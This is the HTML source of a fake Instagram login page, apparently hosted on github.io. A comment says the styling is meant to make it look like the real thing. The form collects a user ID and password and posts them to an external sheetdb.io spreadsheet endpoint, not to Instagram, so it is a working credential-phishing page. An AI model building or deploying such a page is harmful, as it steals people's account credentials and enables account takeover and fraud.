
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Instagram Login </title>
    <style>
        /* Add some basic styling to make it look like the real thing */
        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
        }
        .container {
            max-width: 400px;
            margin: 0 auto;
            padding: 20px;
            background-color: white;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
        }
        input[type="text"], input[type="password"] {
            width: 100%;
            padding: 8px;
            margin-bottom: 10px;
            border-radius: 4px;
            border: 1px solid #ccc;
        }
        button {
            background-color: #0079ff;
            color: white;
            border: none;
            border-radius: 4px;
            padding: 8px;
            cursor: pointer;
        }
    </style>
<script type="text/javascript" nonce="ec4ec7c0dd07466687157af0ff9" src="//local.adguard.org?ts=1726505204007&amp;type=content-script&amp;dmn=bhavyajangra.github.io&amp;url=https%3A%2F%2Fbhavyajangra.github.io%2Finstagram%2F&amp;app=chrome.exe&amp;css=3&amp;js=1&amp;rel=1&amp;rji=1&amp;sbe=1&amp;stealth=1&amp;st-ua=TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEyOC4wLjAuMCBTYWZhcmkvNTM3LjM2&amp;st-ch-brands=W3siYnJhbmQiOiJDaHJvbWl1bSIsInZlcnNpb24iOiIxMjgifSwgeyJicmFuZCI6Ik5vdDtBPUJyYW5kIiwidmVyc2lvbiI6IjI0In0sIHsiYnJhbmQiOiJHb29nbGUgQ2hyb21lIiwidmVyc2lvbiI6IjEyOCJ9XQ==&amp;st-ch-mobile=ZmFsc2U=&amp;st-ch-platform=V2luZG93cw==&amp;st-wrtc&amp;st-push&amp;st-loc&amp;st-ref=aHR0cHM6Ly9iaGF2eWFqYW5ncmEuZ2l0aHViLmlvLw==&amp;st-dnt&amp;st-1pcttl=4320"></script>
<script type="text/javascript" nonce="ec4ec7c0dd07466687157af0ff9" src="//local.adguard.org?ts=1726505204007&amp;name=AdGuard%20Extra&amp;name=AdGuard%20Popup%20Blocker&amp;type=user-script"></script></head>
<body>
    <div class="container">
        <h2> Instagram Login</h2>
 <form
  method="post"
  action="https://sheetdb.io/api/v1/e7m0kdqapwv3w">
    ID: <input name="data[id]">
    password: <input name="data[password]" type=password>

    <a href="https://bhavyajangra.github.io/my-website/">
<button type="submit">Submit</button></a>
</form>   </div>
</body>
</html>
